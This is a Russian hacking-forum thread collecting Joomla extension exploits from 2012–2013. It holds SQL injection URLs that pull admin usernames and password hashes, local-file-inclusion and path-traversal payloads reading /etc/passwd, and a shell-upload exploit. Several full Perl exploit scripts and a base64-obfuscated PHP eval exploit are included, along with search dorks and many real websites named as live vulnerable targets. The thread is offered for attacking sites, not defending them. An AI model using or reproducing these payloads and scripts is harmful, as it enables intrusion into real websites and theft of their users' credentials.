1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Уязвимости Joomla && Mambo

Тема в разделе "Уязвимости популярных CMS", создана пользователем NetSky, 3 ноя 2008.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Joomla Discussions Component (com_discussions) SQL Injection


    Код:
    # 
    # Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
    # Author : Red Security TEAM
    # Date : 17/01/2012
    # Risk : High
    # Software : http://extensions.joomla.org/extensions/communication/forum/13560
    # Tested On : CentOS
    # Contact : Info [ 4t ] RedSecurity [ d0t ] COM
    # Home : http://RedSecurity.COM
    #

    Exploit:
    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=[SQLi]
    Example:

    1. [Get Database Name]

    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
    2. [Get Tables Name]

    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a
    3. [Get Username]

    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
    4. [Get Password]

    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
    (с) bugsearch
     
    19 янв 2012
  2. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    [ Joomla Component com_br LFI Vulnerability ]​


    [x] Author : the_cyber_nuxbie
    [x] Home : www.thecybernuxbie.com
    [x] E-mail : staff@thecybernuxbie.com
    [x] Found : 23 January 2012.
    [x] Tested : Windows 7 Ultimate.
    [x] Dork : inurl:"/index.php?option=com_br"


    [x] Vuln Exploit Report:
    Код:
    http://localhost/index.php?option=com_br&controller=[LFI]
    - Example Website Vuln:
    Код:
    http://beginrecovery.nmy2.com/index.php?option=com_br&controller=../../../../../../../../../../../../../etc/passwd%00
    Joomla XBall SQL Injection​


    • Exploit Title : Joomla Component (com_xball) SQL Injection Vulnerability
    • Author : CoBRa_21
    • E-Mail : uyku_cu [at] windowslive.com
    • My Team : Lojistik ALLSTAR (cyber-warrior.org)
    • Google Dork : inurl:index.php?option=com_xball
    • Status : High-Risk

    SQL Vulnerability

    Код:
    http://127.0.0.1/[PATH]/index.php?option=com_xball&controller=teams&task=show&team_id=-98 (SQL)
    SQL EXPLOIT

    Код:
    +union+select+0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users
    (c) securityhome
     
    23 янв 2012
  3. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit


    Код:
    #!/usr/bin/perl
    # Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
    # www.securitybydefault.com
    # Joomla <2.5.1 time based sql injection - vuln by Colin Wong
    #
    # using sleep() and not benchmark(), change for < mysql 5.0.12
    #
    # 1.- Database name: database()
    # 2.- Users data table name: (change 'joomla' for database() result)
    # 	select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
    # 3.- Admin password: (change zzz_users from previus sql query result)
    # 	select password from zzzz_users limit 1
    use strict;
    use LWP::UserAgent;
    $| = 1;
    my $url = $ARGV[0];
    my $wtime = $ARGV[1];
    my $sql = $ARGV[2];
    unless ($ARGV[2]) {
     print "$0 <url> <wait time> <sql>\n";
     print "\texamples:\n";
     print "\t get admin password:\n";
     print "\t\t$0 http://host/joomla/ 3 'database()'\n";
     print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
     print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
     print "\t get file /etc/passwd\n";
     print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
     exit 1;
    }
    my ($len,$sqldata);
    my $ua = LWP::UserAgent->new;
    $ua->timeout(60);
    $ua->env_proxy;
    my $stime = time();
    my $res = $ua->get($url);
    my $etime = time();
    my $regrtt = $etime - $stime;
    print "rtt: $regrtt secs\n";
    print "vuln?: ";
    my $sleep = $regrtt + $wtime;
    $stime = time();
    $res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
    $etime = time();
    my $rtt = $etime - $stime;
    if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
    my $lenoflen;
    sub len {
     # length of length
     for (1..5) {
    	my $sql=$_[0];
    	$stime = time();
    	$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
    	$etime = time();
    	my $rtt = $etime - $stime;
    	if ($rtt >= $regrtt + $wtime) {
    		$lenoflen = $_;
    		last;
    	}
     }
     for (1..$lenoflen) {
      my $ll;
      $ll=$_;
      for (0..9) {
    	my $sql=$_[0];
    	$stime = time();
    	$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
    	$etime = time();
    	my $rtt = $etime - $stime;
    	if ($rtt >= $regrtt + $wtime) {
    		$len .= $_;
    	}
      }
     }
    	return $len;
    }
    sub data {
     my $sql = $_[0];
     my $len = $_[1];
     my ($bit, $str, @byte);
     my $high = 128;
     for (1..$len) {
     	my $c=8;
     	@byte="";
    	my $a=$_;
    	for ($bit=1;$bit<=$high;$bit*=2) {
    		$stime = time();
    		# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
    		$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
    		$etime = time();
    		my $rtt = $etime - $stime;
    		if ($rtt >= $regrtt + $wtime) {
    			$byte[$c]="0";
    		} else { $byte[$c]="1"; }
    	$c--;
    	}
       	$str = join("",@byte);
    	print pack("B*","$str");
      }
    }
    $len = len($sql);
    print "$sql length: $len\n";
    print "$sql data:\n\n";
    data($sql,$len);
    источник: exploit-db.com
     
    20 мар 2012
    1 человеку нравится это.
  4. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Joomla 2.5 Modules Simple Spotlight Upload Shell


    Код:
    # Author: BL4ckc0d1n6
    # Exploit Title: Simple Upload Modules Simple Spotlight 
    # Date: 3-22-2012
    # Vendor or Software Link:www.pixelpointcreative.com
    # Category: WebApp / Joomla Modules
    # inurl:/modules/mod_ppc_simple_spotlight/elements/upload_file.php
    # Demo Link:
    # http://axiom.pixelpointcreative.com/features/simple-spotlight.html
    # http://lofty.pixelpointcreative.com/features/modules/simple-spotlight.html
    # Version: 2.1.0
    # Price: Non-Commercial
    # Contact: BL4ckc0d1n6@anonymousteam.com / BL4ckc0d1n6@ymail.com
    # Website: anonymousteam.com
    # Greetings to: Flazer | Hmei7 | BaghazzNewbie23 | SutuL | raptorc0der| Doza |
    # 		admin07 | Rose | zamie1st | Sheep139 | K4C3Undetected | All KCH Crew | 
    # 		Indonesian Cyber Army | Indonesian Cyber Center | All Group and Forum Hacker Indonesia
    # 		~ special thanks to : jos_ali_joe (exploit-id.com)  and You

    [Exploit]

    Код:
    http://127.0.0.1/modules/mod_ppc_simple_spotlight/elements/upload_file.php
    Код:
    http://127.0.0.1/modules/mod_ppc_simple_spotlight/img/[shell.php.jpg]

    [Sample]
    -
    Код:
    http://www.kennedyhschicago.org/modules/mod_ppc_simple_spotlight/img/index.html
    -
    Код:
    http://www.itcwp.com/joomla/modules/mod_ppc_simple_spotlight/img/index.html
     
    22 мар 2012
  5. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    joomla component (com_ponygallery) SQL injection


    Код:
    ##################################################
    # Exploit Title: joomla component (com_ponygallery) SQL injection Vulnerability
    # Download : http://www.adyawinsa.com/index.php/remository?func=fileinfo&id=2
    # Date: 11/04/2012
    # Author: xDarkSton3x
    # E-mail : xdarkston3x@msn.com
    # Category: webapps
    # Google dork: inurl:"com_ponygallery"
     
     
    ##################################################
     
    [~]Exploit/p0c :
    http://www.site.com/index.php?option=com_ponygallery&Itemid=[sqli]
     
    Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team  -  DiosdelaRed -  RemoteExecution ] [ Dedalo - Maztor ]
     
    16 апр 2012
  6. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Joomla template JA T3-Framework Directory Traversal Vulnerability 0-Day


    Код:
    # Vendor:
    hhttp://extensions.joomla.fr/extensions/index-des-extensions-fr/1788-Templates/4151-ja-t3-framework-joomla-15
    
    # Author : indoushka
    
    # Tested on : Ubuntu Linux 9.10



    # Dork : inurl:/index.php?jat3action=

    # Demo :
    Код:
    http://www.maxim-tours.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=
    gzip&type=css&v=1
    Код:
    http://www.taqadoumy.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
    ip&type=css&v=1
    Код:
    http://iraneconomist.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
    ip&type=css&v=1
    Код:
    http://yxact.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&t
    ype=css&v=1
    Код:
    http://www.rtmcsumut.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
    ip&type=css&v=1
    Код:
    http://news.lk/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&typ
    e=css&v=1
    Код:
    http://www.guiaenarm.net/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
    ip&type=css&v=1
    Код:
    http://britanskie-kotiki.ru/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action
    =gzip&type=css&v=1
    Код:
    http://profidom.com.ua/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip
    &type=css&v=1
    -------------

    Код:
    http://localhost/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&
    amp;type=css&v=1
    (c) 1337day.com
     
    23 апр 2012
  7. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Joomla com_eslamiat Sql Injection Vulnerability


    Код:
    # Exploit Title: Joomla com_eslamiat Sql Injection Vulnerability
    # Exploit Author: Siamak.Black
    # Tested on: BackTrack , 7 , Redhat
    # Version : 1.5
    # Script Site : http://www.joomla.org
    # MAil : siam4k.black@yahoo.com
    # Home : IRaNHACK.ORG
    # Team : IRANHACK SECURITY TEAM
    Dork:
    Код:
    inurl:index.php?option=com_eslamiat&Itemid=
    Код:
    inurl:com_eslamiat&Itemid=
    Exploit:
    Код:
    http://Site.CoM/index.php?option=com_eslamiat&Itemid=24&task=Maraghed&mode=[Sqli]
    Код:
    http://Site.CoM/index.php?option=com_eslamiat&Itemid=[Sqli]
    Example:

    Код:
    http://arabic.irib.ir/index.php?option=com_eslamiat&Itemid=24&task=Maraghed&mode=-912+/*!union*/+/*!select*/+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--
    information:

    Код:
    Crack Joomla Hash IN ~~~ > http://www.md5decrypter.co.uk/
    
    Admin Page ~~~~~~~~~> Administrator
    (c) iranhack.org
     
    6 июн 2012
  8. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Joomla Component com_hello Local File Include

    Код:
    Author : Ajax Security Team
    
    Discovered By : devilzc0der & Dominator
    
    Dork : inurl:"com_hello"
    
    h0m3 : www.ajaxtm.com
    
    Software Link : www.joomla.com
    p0c:
    Код:
    com_hello&controller=../../../../../../../../etc/passwd%00

    Example:
    Код:
    http://site.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
    source: securityfocus.com​
     
    23 июл 2012
  9. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    50
    Joomla Spider Calendar Lite Remote Exploit

    Information:

    Код:
     Exploit Title: Joomla spider calendar lite Remote Exploit
     dork: inurl:com_spidercalendar
     Date: [29-08-2012]
     Author: Daniel Barragan "D4NB4R"
     Twitter: @D4NB4R
     site: http://poisonsecurity.wordpress.com/ 
     Vendor: http://web-dorado.com/products/spider-calendar-lite.html 
     Version: Last  
     License: Non-Commercial
     Demo: http://web-dorado.com/products/spider-calendar-lite.html
     Download: http://web-dorado.com/products/spider-calendar-lite.html  
     Tested on: [Linux(bt5)-Windows(7ultimate)]
     Especial greetz:  _84kur10_, dedalo, nav
    

    Descripcion


    Код:
    
    Spider Calendar Lite is a highly configurable Joomla extension which allows you to have multiple organized events in a calendar. You can create as many events as you need for a day. With a simple click on the date you will see the events and their descriptions recorded for that day. 
    
    Usage:  http:// 127.0.0.1/exploit.php
    
    note: Copy the following code completely and paste it in your file exploit.php 

    Exploit:

    Код:
    <script><!--
    document.write(unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3ESpider%20Calendar%20Joomla%20Exploit%3C/title%3E%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Diso-8859-1%22%3E%3Cstyle%20type%3D%22text/css%22%3E%0A%3C%21--%0Abody%2Ctd%2Cth%20%7B%0A%09color%3A%20%23FF0000%3B%0A%7D%0Abody%20%7B%0A%09background-color%3A%20%23000000%3B%0A%7D%0A--%3E%0A%3C/style%3E%3C/head%3E%0A%0A%3Cbody%3E%3Cbr%3E%0A%3Cbr%3E%3Ccenter%3E%0A%3Cimg%20src%3D%22http%3A//a4.sphotos.ak.fbcdn.net/hphotos-ak-ash3/553280_444893268875730_721348140_n.jpg%22%20width%3D%22125%22%20height%3D%22109%22%20align%3D%22middle%22%20longdesc%3D%22Posion%20Security%20%22%3E%3Cbr%3E%3C/center%3E%0A%3Cdiv%20align%3D%22center%22%3E%3Cbr%3E%0A%20%20%3Ca%20href%3D%22https%3A//poisonsecurity.wordpress.com%22%3EPoison%20Securtity%3C/a%3E%20%3Cbr%3E%0A%20%20Joomla%20Spider%20Calendar%20Remote%20Sql%20Exploit%0A%20%3Cbr%3E%0A%20%20%3Cbr%3E%0A%20%20%0A%3C/div%3E%0A%3Cform%20action%3D%22%3Faction%3Dexploit%22%20METHOD%3D%22post%22%3E%0A%3Ctable%20border%3D0%3E%0A%3Ctr%3E%0A%3Ctd%3EIngrese%20La%20url%20del%20Sitio%20%3C/td%3E%0A%3Ctd%3E%3Cinput%20type%3D%22text%22%20name%3D%22url%22/%3E%3C/td%3E%3Ctd%3E%3Cinput%20type%3D%22submit%22%20name%3D%22launch%22/%3E%3C/td%3E%0A%3C/tr%3E%0A%3C/table%3E%0AUso%20%20http%3A//127.0.0.1/path/%3Cbr%3E%0APosible%20dork%3A%20inurl%3Acom_spidercalendar%3Cbr%3E%0A%3Cbr%3E%20%0A%3C/form%3E%0A%3C/body%3E%0A%0A%3C/html%3E"));
    //--></script><?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYoJF9HRVRbJ2FjdGlvbiddPT0nZXhwbG9pdCcpDQp7DQokcmVzdWx0YWRvPWZpbGVfZ2V0X2NvbnRlbnRzKCRfUE9TVFsndXJsJ10uIi9pbmRleC5waHA/b3B0aW9uPWNvbV9zcGlkZXJjYWxlbmRhciZkYXRlPTk5OTk5OS45JTI3JTIwdW5pb24lMjBhbGwlMjBzZWxlY3QlMjBudWxsJTJDbnVsbCUyQ2NvbmNhdCUyODB4M0QzRDNEM0QzRCx1c2VybmFtZSwweDNELHBhc3N3b3JkLDB4M0QzRDNEM0QzRCUyOSUyQ251bGwlMkNudWxsJTJDbnVsbCUyMGZyb20lMjBqb3NfdXNlcnMrLS0rJTIwRDROQjRSIik7DQokcGFydGVzPWV4cGxvZGUoIj09PT09IiwkcmVzdWx0YWRvKTsNCmVjaG8gJHBhcnRlc1sxXTsNCn1lbHNlew0KZWNobyAiSW5ncmVzZSBVcmwiOw0KfQ0KLy9ENE5CNFIgMjAxMg0KLypTaSB1c3RlZCBlc3RhIGxleWVuZG8gZXN0ZSBtZW5zYWplIGxvIGZlbGljaXRvIHBvciBxdWUgc2lnbmlmaWNhIHF1ZSBubyBsZSBiYXN0YSBzb2xvIGNvbiBxdWUgbGUgZGUgbGEgY2xhdmUsIHNpIG5vIHF1ZSB1c3RlZCBxdWllcmUgc2FiZXIgZWwgcG9ycXVlIGRhIGxhIGNsYXZlLCBhdW5xdWUgZXMgYWxnbyB0YW4gc2ltcGxlIGVzbyBsbyBoYWNlIGRpZmVyZW50ZSBkZSBtdWNob3MsIG1pIGFtaWdvIF84NGt1cjEwXyB5IHlvIEQ0TkI0UiBsZSBzYWx1ZGFtb3MqLw=="));
    ?>
     
    30 авг 2012
    1 человеку нравится это.
  10. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    50
    Joomla Component (com_icagenda) Blind SQLi/Path Disclosure

    Information:

    Код:
    Exploit Title: Joomla Component (com_icagenda) Blind SQLi/Path Disclosure . 
    Date: 31 August 2012
    Author: Dark-Puzzle (Souhail Hammou)
    Risk : Critical
    Version: All Versions
    Google Dork : N/A
    Category: Webapps/0day
    Tested on: Windows Xp Sp2 Fr .
    
    Blind SQL Injection Vulnerability:

    Код:
    	Vulnerability :
    
    	"id" parameter in com_icagenda is prone to a Blind SQL Vulnerability . An attacker can retrieve & steal data by sending series of True and False Queries through SQL statements .
    	Here the invisible content shows us that the target suffers from BSQLi .
    
    	Example : 
    
    	www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True)
    	www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)
    
    	Live Example :
    
    	http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True) Content is displayed
    	http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)
    
    	Other Live Examples :
    
    	http://www.brie-danse.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=133&id=3 and 1=2 (False) --> Blind Injection .
    	http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=107&id=1 and 1=2 (False) --> Blind Injection
    
    	ADMIN PANEL : http://target/administrator
    	Then you can upload your shell & enjoy the rest .
    Full Path Disclosure Vulnerability

    Код:
    The Full path can be retrieved using Array method [] in ItemID & id Parameters .
    	
    	Live Examples :
    		http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid[]=107&id=1
    		http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
     
    31 авг 2012
  11. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Joomla Component RokModule Blind SQLi [module] Vulnerability

    Код:
    Nombre del Componente: Com_rokmodule
    
    Empresa: http://www.rockettheme.com/
    
    Testeado: Linux Backtrack
    
    Autor: Yarolinux Para WebSecurityDev
    Twitter: @Yarolinux
    
    Fecha: 09/09/2012
    Код:
    http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]
    Код:
    http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]
     
    11 сен 2012
  12. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Joomla tag Remote Sql Exploit


    dork: inurl:index.php?option=com_tag

    Date: [18-10-2012]

    Author: Daniel Barragan "D4NB4R"

    Twitter: @D4NB4R

    Vendor: http://www.joomlatags.org

    Version: all

    License: Non-Commercial

    Download: http://www.joomlatags.org/joomla-tag/joomla-tag-download.html

    Tested on: [Linux(bt5)-Windows(7ultimate)]

    Especial greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


    Descripcion: N/A

    Exploit:

    Код:
     
     
        #!/usr/bin/perl -w
        # Joomla Component (tag) Remote SQL Exploit
        #----------------------------------------------------------------------------#
     
        ########################################
        print "\t\t\n\n";
    print "\t\n";
    print "\t            Daniel Barragan  D4NB4R                \n";
    print "\t                                                   \n";
    print "\t      Joomla com_tag Remote Sql Exploit \n";
    print "\t\n\n";
     
    use LWP::UserAgent;
    print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
     
    chomp(my $target=<STDIN>);
     
        #the username of  joomla
        $user="username";
        #the pasword of  joomla
        $pass="password";
        #the tables of joomla
        $table="jos_users";
        $d4n="com_tag&task";
        $component="tag&lang=es";
         
        $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
        $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
         
        $host = $target ."index.php?option=".$d4n."=".$component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
        $res = $b->request(HTTP::Request->new(GET=>$host));
        $answer = $res->content;
         
        if ($answer =~ /<user>(.*?)<user>/){
                print "\nLos Datos Extraidos son:\n";
          print "\n
          
    * Admin User : $1";
          
        }
         
        if ($answer =~/<pass>(.*?)<pass>/){print "\n
          
    * Admin Hash : $1\n\n";
          
        print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
        else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
    
     
    Последнее редактирование: 22 окт 2012
    22 окт 2012
  13. CryNEt
    CryNEt Новичок
    Симпатии:
    4
    Test screen [http://data.imagup.com/10/1171476626.png] [http://168.63.206.26/test2.png]
    3xpl01t c0d3 :

    Код:
    Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"
    author : *devil-zone.net
    greet is to : devil-zone.net *all members 
    vel = sqlI 
    S1mPl3 P3rL 3xpl01t3r

    Код:
    #!/usr/bin/perl
    #greet is to Evil-Dz
    system("clear");
    print "***************************************\n";
    print " * * * * Good Luck & Hafe Fun * * * * *\n";
    print " * * * Coded by devil-zone forum * * **\n"; 
    print "***************************************\n\n";
    use LWP::UserAgent;
    print "Target page [ex: HosT] --> ";
    chomp(my $target=<STDIN> );
    $column_name="concat(username,0x3a,password,0x3a,mail)";
    $table_name="jos_users";
    $prm="-1/**/union/**/select/**/";
    $start= LWP::UserAgent->new() or die "[!] Error while processing";
    $start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
    $website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
    $ok= $start->request(HTTP::Request->new(GET=>$website));
    $ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
    print "[+] Password found --> $1\n\n";
    sleep 1;
    }
    else
    {
    print "No password found :(\n";
    } 
     
    22 янв 2013

Поделиться этой страницей

Загрузка...